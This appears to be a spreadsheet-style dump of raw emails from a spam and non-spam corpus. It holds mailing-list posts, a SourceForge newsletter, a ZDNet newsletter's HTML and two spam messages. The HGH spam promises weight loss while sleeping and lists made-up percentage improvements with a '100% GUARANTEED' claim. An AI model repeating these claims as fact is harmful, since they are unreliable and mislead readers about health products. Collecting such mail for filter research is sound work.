 &gt; escape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should 
 &gt; it?  It appears that my MH is MH 6.8.  Does NMH fix this?
 &gt; 
 &gt; Jason D. M. Rennie
 &gt; MIT AI Lab
 &gt; jrennie@ai.mit.edu
 &gt; (617) 253-5339
 &gt; http://www.ai.mit.edu/~jrennie/
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Exmh-users mailing list
 &gt; Exmh-users@redhat.com
 &gt; https://listman.redhat.com/mailman/listinfo/exmh-users
 &gt; 
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EASILY Lose Weight / Build Muscle / Reverse Aging!21231
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;table border=3D"2" cellpadding=3D"4" width=3D"51%" height=3D"3=
 70"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"19"&gt;&lt;a href=3D"http://www.quality-hgh.com=
 "&gt;&lt;img border=3D"0" src=3D"http://www.quality-hgh.com/ads/qualityhgh_ad.gi=
 f" width=3D"468" height=3D"60"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;&lt;tr&gt;
     &lt;td width=3D"100%" height=3D"327"&gt;&lt;font size=3D"4" face=3D"Arial"&gt;&lt;b&gt;A=
 s seen on NBC, CBS, CNN, and Oprah!&lt;/b&gt;&lt;/font&gt;
       &lt;p&gt;&lt;font size=3D"4" face=3D"Arial"&gt;&lt;b&gt;Would you like to lose weight =
 while you
       sleep?&lt;/b&gt;&lt;br&gt;
       No dieting!&lt;br&gt;
       No hunger pains!&lt;br&gt;
       No Cravings!&lt;br&gt;
       No strenuous exercise!&lt;br&gt;
       Change your life forever!&lt;br&gt;
       100% GUARANTEED!&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"4" face=3D"Arial"&gt;&lt;a href=3D"http:=
 //www.quality-hgh.com"&gt;www.Quality-HGH.com&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;hr&gt;
       &lt;p&gt;&lt;font size=3D"4" face=3D"Arial"&gt;* Body Fat Loss            82% im=
 provement.&lt;br&gt;
       * Wrinkle Reduction     61% improvement.&lt;br&gt;
       * Energy Level              84% improvement.&lt;br&gt;
       * Muscle Strength         88% improvement.&lt;br&gt;
       * Sexual Potency         75% improvement.&lt;br&gt;
       * Emotional Stability      67% improvement.&lt;br&gt;
       * Memory                      62% improvement.&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"4" face=3D"Arial"&gt;&lt;a href=3D"http:=
 //www.quality-hgh.com"&gt;www.Quality-HGH.com&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"1" color=3D"#808080"&gt;&lt;b&gt;HOW TO UNSUBSCRIBE:&amp;nbsp;&lt;/b&gt;&lt;br&gt;
 You received this e-mail because you are registered at one of our Web site=
 s, or on one of our partners' sites.&lt;br&gt;
  If you do not want to receive partner e-mail offers, or any email marketi=
 ng from us please
 &lt;a href=3D"mailto:freeadsnet@btamail.net.cn"&gt; click here.&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/p&gt;
 &lt;/body&gt;&lt;/html&gt;
 lindacucme@att.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The DEBT-$AVER Program              SKYXTGM
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;/HEAD&gt;&lt;BODY&gt;&lt;CENTER&gt;
 &lt;A href=3D"http://marketing-fashion.com/user0205/index.asp?Afft=3DDP15"&gt; 
 &lt;IMG src=3D"http://61.129.68.17/debt1.gif" border=3D0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D1&gt;
 Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer like us=
 to contact you or feel that you have&lt;BR&gt;received this email in error, 
 please &lt;A href=3D"http://marketing-fashion.com/light/watch.asp"&gt;click here=
 to unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SOURCEFORGE.NET UPDATE: August 14, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">
 (You are receiving this email because you subscribed to it (honest).
 For information on how to unsubscribe please read the bottom of this
 email).
 0. INTRO.  [IBM DB2]
 1. INCREASED DOWNLOAD CAPACITY.
 2. AUDIO OF KERNEL SUMMIT AVAILABLE.
 3. BE A SF.NET FOUNDRY GUIDE.
 4. WORK FOR SOURCEFORGE.NET
 5. SITE STATISTICS
 0. INTRO
 Hello SourceForge.net Users,
 This week we've made a big announcement.  As you likely know, any
 large dynamic website is powered by a database that funnels data to
 the web servers serving data which ultimately gets sent to you.
 These databases manage everything from user authentication, session
 management, site searching, etc.  SourceForge.net is a database-
 dependent website.
 Today we have announced that we are moving SourceForge.net to DB2,
 a powerful relational database by IBM.  We are doing this because
 the site continues to grow at a rapid rate, with 700 new users and
 70 new projects a day, and we need a database that can handle this
 growth.  We feel that DB2 can do this for us, and IBM is giving us
 the resources to make this transition successful.  You can read the
 press release here:
 http://www.vasoftware.com/news/press.php/2002/1070.html
 How will this effect you?  In the first phase, you won't see much
 difference other then the site will continue to grow and the
 SourceForge.net team will be able to handle the growth.  In later
 phases you will see new features on the site that take advantage of
 the databases advanced capabilities.
 Today our mail archives have been converted over.  The rest of the
 site will make the migration to DB2 in the coming months.
 If you have questions about this or any other aspect of the site,
 please feel free to email me, pat@sourceforge.net.  I always
 appreciate the feedback.
 Thank you for your continued support of SourceForge.net and the
 Open Source Community.
 Pat-
 Patrick McGovern
 Director, SourceForge.net
 1. INCREASED DOWNLOAD CAPACITY
 SourceForge.net continues to grow, and it's appetite for bandwidth
 is never-ending.  Every day SF.NET serves over 300,000 files to
 ensure that developers and end-users within the Open Source
 community can always obtain the software released by hosted
 projects, SourceForge.net maintains a network of high-capacity
 download servers.  These servers are located throughout the world,
 as to provide better download times regardless of which network
 provider you are using, and regardless of your geographic location.
 Three new download servers have recently been added to our network,
 further strengthening our file serving capabilities.  These latest
 additions include servers hosted by:
 Time Warner Telecom (Wisconsin,USA);
 http://www.twtelecom.com/
 University of Minnesota (Minnesota, USA)
 http://www.umn.edu/
 CESNET (Czech Republic)
 http://www.cesnet.cz/
 We thank these sponsors for their commitment to SourceForge.net and
 the needs of the Open Source community.
 On a related note, we are looking for a mirror in Japan.  If you are
 an ISP or University in Japan and are willing to spare 20Mbps for a
 SourceForge.net mirror (we'll supply the hardware), please let us
 know at bandwidth@sourceforge.net
 2. AUDIO OF KERNEL SUMMIT AVAILABLE
 SourceForge.net now has the audio from the entire 2002 OSDN/USENIX
 Kernel Summit, held in June.  Listen to the Linux kernel master
 discuss such hot topics as kernel modules, virtual memory,
 block I/O, database scaling, security modules, and async I/O.
 You may find this audio repository at:
 http://linuxkernel.foundries.sourceforge.net/article.pl?sid=02/06/26/0116225
 3. CONTRIBUTE TO SOURCEFORGE.NET! BE A FOUNDRY GUIDE!
 Want to contribute to SourceForge.net, but you don't know how to
 code? Be a foundry guide!  Foundry guides get to hype the cool
 projects that they think are worth downloading and testing.
 A guide finds all the stuff on the web about their subject of
 choice, and gives it prominent placement.  How do you become a
 foundry guide? Go to http://foundries.sourceforge.net/; find a
 topic that interests you; and send email to
 foundries@sourceforge.net stating your desired topic and why you
 are qualified to be a foundry guide.
 4. WORK FOR SOURCEFORGE.NET
 We have a new position for a senior web developer available at
 SourceForge.net.  We are looking for someone to help us maintain,
 upgrade, and add new features to SourceForge.net.  Ideal person has
 5+ years of development experience on high end, high volume
 websites (3+ million page views a day).  Has a vast level of
 knowledge of Internet technologies:  PHP, PostgreSQL, MySQL, DB2,
 Linux, PERL, Apache, LDAP, Mailman.  A flare for design / UI is a
 bonus.  SourceForge is a unique site with unique challenges.  We are
 looking for someone at the top of their game.
 Location of Job is in Fremont, California.  Please send resume and
 URL's of sites you have worked on to jobs@sourceforge.net.  Text
 resumes only.  (No MS WORD files!)
 5. SITE STATISTICS
 Stats: (Monday 12th, 2000)
 Hosted Projects: 45,194
 Registered Users: 465,530
 Page Views: 3,344,708 in a single day (Monday)
 Files transfered in a single day: 340,838 (Monday)
 Emails sent in a single day from Mailing lists: 851,143 (Monday)
 Top Ten Projects
 1 phpMyAdmin
 http://sourceforge.net/projects/phpmyadmin/
 phpMyAdmin is a tool written in PHP intended to handle the
 administration of MySQL over the WWW.  Currently it can create and
 drop databases, create/drop/alter tables, delete/edit/add fields,
 execute any SQL statement, manage keys on fields.
 2 Compiere ERP + CRM Business Solution
 http://sourceforge.net/projects/compiere/
 Smart ERP+CRM solution for small-medium enterprises (SME) in the
 global marketplace covering all areas from customer management,
 supply chain and accounting.  For $2-200M revenue companies looking
 for "brick and click" first tier functionality.
 3 SquirrelMail
 http://sourceforge.net/projects/squirrelmail/
 SquirrelMail is a PHP4-based Web email client.  It includes built-in
 pure PHP support for IMAP and SMTP, and renders all pages in pure
 HTML 4.0 for maximum compatibility across browsers.  It also has
 MIME support, folder manipulation, etc
 4 TUTOS
 http://sourceforge.net/projects/tutos/
 TUTOS is the ultimate team organization software, a web-based
 groupware or ERP/CRM system to manage events/calendars, addresses,
 teams, projects,tasks,bugs,mailboxes,documents and your time spent
 with these things
 5 JBoss.org
 http://sourceforge.net/projects/jboss/
 The JBoss/Server is the leading Open Source, standards-compliant,
 J2EE based application server implemented in 100% Pure Java
 6 Firewall Builder
 http://sourceforge.net/projects/fwbuilder/
 Object-oriented GUI and set of compilers for various firewall
 platforms.  Currently implemented compilers for iptables, ipfilter
 and OpenBSD pf
 7 openMosix
 http://sourceforge.net/projects/openmosix/
 openMosix is a Linux kernel extension for single-system image
 clustering.  Taking n PC boxes, openMosix gives users and
 applications the illusion of one single computer with n CPUs.
 openMosix is perfectly scalable and adaptive.
 8 CDex
 http://sourceforge.net/projects/cdexos/
 CDex a CD-Ripper, thus extracting digital audio data from an Audio
 CD. The application supports many Audio encoders, like MPEG
 (MP2,MP3), VQF, AAC encoders.
 9 phpChrystal - An Open Intranet System
 http://sourceforge.net/projects/phpchrystal/
 phpChrystal ist ein OpenSource-Intranetsystem welches vorrangig auf
 Lan-Partys eingesetzt werden kann.  Vorteile von phpChrystal sind
 seine Portierbarkeit, Flexibilitt und Performance, da es vollends
 auf PHP, MySQL und XML basiert
 10 Dev-C++
 http://sourceforge.net/projects/dev-cpp/
 Dev-C++ is an full-featured Integrated Development Environment
 (IDE) for Win32 and Linux.  It uses GCC, Mingw or Cygwin as
 compiler and libraries set.
 More Top Projects:
 http://sourceforge.net/top/mostactive.php?type=week
 EMAIL LIST REMOVAL:
 When the SF.NET team sends out a site-wide email, we sometimes see
 replies that look like this:  "Hey!! I didn't subscribe to this list!!!
 You spammer. I hate you!  I hate your dog!  (insert other colorful
 phrases here)".  The truth is, when you registered on SourceForge.net
 there was a check box that said "Receive Site-wide updates, low
 volume".  You left it checked when you submitted the registration form,
 hence you are receiving this email.  We send these updates every 4 to 6
 weeks, so it truly is low volume.  However if you want off, this is not
 a problem.  Simply click on the link below.
 ==================================================================
 You receive this message because you subscribed to SourceForge
 site mailing(s). You may opt out from some of them selectively
 by logging in to SourceForge and visiting your Account Maintenance
 page (http://sourceforge.net/account/), or disable them altogether
 by visiting following link:
 &lt;http://sourceforge.net/account/unsubscribe.php?ch=_ac9d9e63f055a6f7&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Daypop is back. _Ye-hi._
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:6:31:40PM
 Date: Thu, 26 Sep 2002 01:31:40 GMT
 Daypop[1] is back. _Ye-hi._
 [1] http://www.daypop.com/top/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Performance
</t>
  </si>
  <si>
    <t xml:space="preserve">Has anyone noticed a drop in razor-check performance over the past week?
 I disabled the razorchecks in Spamassassin and my queues start to clean
 out again.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Secure Sofware Key
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Hi, 
    I am wondering if there are any techniques to make a CD-Key of the like 
 unbreakable.  Either by giving it a cancelation date and a periodic renewal 
 from a server or just by using self md5 signature on the resulting 
 executable.  I know it must not be easy because the whole software piracy 
 problem would be resolved but there must be some way to make it really hard 
 to break it.  Anyone have hints on this issue ?
 Thanks
 - -- 
 Yannick Gingras
 Network Programer
 ESC:wq
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9bpYzuv7G0DNFO+QRAqBhAKChTeKXwD8zDMwf+okAKJXnnpknwACgtXZ7
 v3bBABue0VX/Uy86Fhn9Ifs=
 =Uwqj
 -----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Sony Vaio: When small becomes TOO small [ANCHORDESK]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</si>
  <si>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=3Db4-aJlbQ6Z1xDZVox8qJzDxDXozLCyR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
    &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3Dc9-3OZLQpg=
 kUN7mSfSjg0SxiPZvH6lR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img s=
 rc=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br=
 &gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dde-7tpkQMW=
 aOA_r5o6tTbDS-BJjho4R" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out these personal laser printer picks at ZDNet Reviews.&lt;/b&gt;&lt;/font&gt;&lt;/=
 a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" hei=
 ght=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Df3-LjwgQJO=
 wjRBoIYxCs3CyJqsjeorR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 See how WAP works and how you should use it at Builder.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;=
 br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=
 =3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D08-IFoQIRj=
 FUrr50LHg3F-erCpGY9iR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a new job? Find one today in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;=
  &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D=
 "6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D1d-6KTjIGQ=
 F77BfQD3Rl28NRQSnqQPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 CIOs talk out about the future of IT at CNET News.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;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&gt;FRI JUL 12,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ck?q=3D32-Gx5IIrQ6jNYa9RqDFWVhZSgRXBnR" &gt;&lt;b&gt;New Sony Vaio: When small becom=
 es TOO small&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/cl=
 ear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 Sometimes hardware vendors take this whole smaller-is-bette=
 r thing way, way too far. Witness the Sony Vaio U1. This tiny PC--so far fo=
 r sale only in Asia--is too small for a jumbo-sized Texan like me to use. B=
 ut, dang, it's cute!&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D48-ggFbIdB=
 sy9f6V3UXl_kj2ZBSJuRR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D5d-JN-bIK0=
 sj9A1OwEobvZm5yGKIaZR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: The changing geography o=
 f the Net&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif"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href=3D"http://clickthru.online.com/Click?q=3D72-R8PHIPUf02siCzw=
 rqMtNXjoCKqdR" &gt;New security holes found in Outlook, IE... MS networks your=
  home &lt;/a&gt;&lt;p&gt;
          =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D87-izDOQ8naPmmP-hF=
 eplrQ8kasp4eR" &gt;Toshiba's new Pocket PC: Beautiful inside and out&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D9c-xt6pQanyk_ysloA=
 lXdIl9Oi-UiyR" &gt;3 tools for viewing any file format under the sun&lt;/a&gt;&lt;p&gt;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
 g=3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;    &lt;tr bgcolor=3D"#999999"&gt;&lt;td co=
 lspan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ff=
 ffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fron=
 tpage/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;    &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D=
 "http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=
 =3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td colspan=3D"3"&gt;=
 &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" heigh=
 t=3D5 width=3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td bgc=
 olor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=
 =3D"top"&gt;    &lt;td width=3D"100%"&gt;          &lt;table width=3D"100%"  cellpaddin=
 g=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font =
 face=3D"verdana, geneva" color=3D"#333333" size=3D"-2"&gt;&lt;b&gt;CD-RW drives&lt;/b&gt;&lt;=
 /font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/=
 b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;        &lt;tr valign=3D"top"&gt;    =
    &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Db1-Yjx=
 JQ-0dz-PqPYWr9i_f_B0NLnlR" &gt;&lt;img src=3D"http://www.zdnet.com/products/graph=
 ics/070802cdfirewire.jpg" width=3D"85" height=3D"110" border=3D"0" alt=3D""=
  /&gt;&lt;/a&gt;&lt;/td&gt;       &lt;td width=3D"5"&gt;&lt;img src=3D"http://www.zdnet.com/graphic=
 s/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;        &lt;td width=
 =3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://cli=
 ckthru.online.com/Click?q=3Dc6-URF9QMLKgZZ5uzgWdT_pfmeDx04R" style=3D"text-=
 decoration:none"&gt;&lt;b&gt;Flashy, fast FireWire CD-RW drives&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Need t=
 o rip some audio while you're on the road? Gotta back up a PC or a Mac? ZDN=
 et reviewers say: Check out these speedy, portable CD burners.&lt;/font&gt;&lt;/td&gt; =
     &lt;/tr&gt;           &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/=
 graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D=
 "http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D"8" heigh=
 t=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1=
 "&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Ddb-rmY9QJEK6LDesNkvpmtTw=
 xp6DtrR" style=3D"text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;  =
       &lt;/table&gt;    &lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td width=3D"180"&gt; =
         &lt;table cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"=
 0" bgcolor=3D"#eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspan=3D"3" he=
 ight=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff" size=3D"=
 -2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" h=
 eight=3D1 width=3D3&gt;Most Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;       =
      &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.g=
 if" width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;fo=
 nt face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.=
 com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" =
 border=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;Removable Storage&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"=
 http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" heigh=
 t=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://cl=
 ickthru.online.com/Click?q=3Df0-nv_DQWg4K4Npqud2fqfAgMcXeaiR" style=3D"text=
 -decoration:none"&gt;IBM Deskstar 120GXP&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet=
 .com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D""=
  border=3D"0" /&gt;&lt;br /&gt;          &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D06-fP6uI482ubTvT6omap_vCgSyiL4R" style=3D"text-decoration:n=
 one"&gt;HP DVD-Writer DVD100i&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphi=
 cs/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"=
 0" /&gt;&lt;br /&gt;          &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click=
 ?q=3D1b-wAnhI3N2I67fteNQ1U5MauO37xrR" style=3D"text-decoration:none"&gt;Lite-O=
 n 40X/12X/48X EIDE&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br=
  /&gt;       &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D30-u8N=
 EIRrWEtxZz7A8IeOdSKzjX1iR" style=3D"text-decoration:none"&gt;Pioneer DVR-A04&lt;/=
 a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;b&gt;5&lt;/b&gt;. &lt;=
 a href=3D"http://clickthru.online.com/Click?q=3D45-fNkJIKB680KVZax-EDvznhjo=
 nlZR" style=3D"text-decoration:none"&gt;Western Digital Caviar WD1200JB&lt;/a&gt;&lt;br=
  /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" wi=
 dth=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;img src=3D"http=
 ://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D"8" height=3D"=
 10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click=
 ?q=3D5a-ahD1IP0IMbr7JGw24YOLpk6Td6dR" style=3D"text-decoration:none"&gt;More p=
 opular storage products&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;            &lt;img src=3D"http://www.zdn=
 et.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;/font&gt;&lt;/td&gt;            &lt;td&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10" =
 height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;/table&gt;=
     &lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;=
 &lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999999"&gt;&lt;img src=3D"http://=
 www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/t=
 d&gt;&lt;/tr&gt;    &lt;/table&gt;    &lt;!-- /### --&gt; &lt;table cellpadding=3D10 border=3D0 cel=
 lspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D6f-3x79IOLAbHArPFw3RXvLF34ULXuR"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://clickthru.online.com/Click?q=3D85-2G2oQ7KQfYG7VnTaf70SVbToBBPR" &gt;&lt;b&gt;New =
 security holes found in Outlook, IE... MS networks your home&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Sec=
 urity experts have discovered two new vulnerabilities in Internet Explorer =
 and Outlook that leave your system open to hack attacks. Plus: MS will soon=
  help you technify your whole house with easy-to-use home-networking gear. =
 &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
